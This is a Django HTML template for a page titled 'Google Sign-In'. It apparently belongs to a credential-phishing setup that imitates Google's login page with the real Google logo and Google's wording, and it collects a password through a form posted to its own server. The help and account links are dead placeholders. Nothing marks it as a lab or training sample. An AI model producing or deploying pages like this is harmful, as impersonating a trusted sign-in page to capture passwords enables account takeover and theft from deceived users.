{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Google Sign-In</title>
  <link rel="stylesheet" href="{% static 'networkbinary/css/go.css' %}"/>
  <link rel="stylesheet" href="{% static 'networkbinary/css/go.css' %}"/>
  <link rel="icon" type="image/png" href="{% static 'networkbinary/images/goo2.png' %}">


</head>
<body>
  <div class="main-container">
    <div class="card">
      <div class="left">
        <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="Google Logo" class="logo"/>
        <h1>Sign in</h1>
        <p class="desc">with your Google Account. This account will be available<br> to other Google apps in the browser.</p>
      </div>
      <div class="right">
        <form method="POST">
          {% csrf_token %}
          <label for="email">Password</label>
          <input type="text" id="password" name="password" required />
          <a href="#" class="link">Forgot email?</a>
          <p class="info">
            Not your computer? Use Guest mode to sign in privately. <br>
            <a href="#" class="link">Learn more about using Guest mode</a>
          </p>
          <div class="form-actions">
            <a href="#" class="link">Create account</a>
            <button type="submit">Submit</button>
          </div>
        </form>
      </div>
    </div>
    <div class="footer">
      <span>English (United States)</span>
      <div class="footer-links">
        <a href="#">Help</a>
        <a href="#">Privacy</a>
        <a href="#">Terms</a>
      </div>
    </div>
  </div>
</body>
</html>

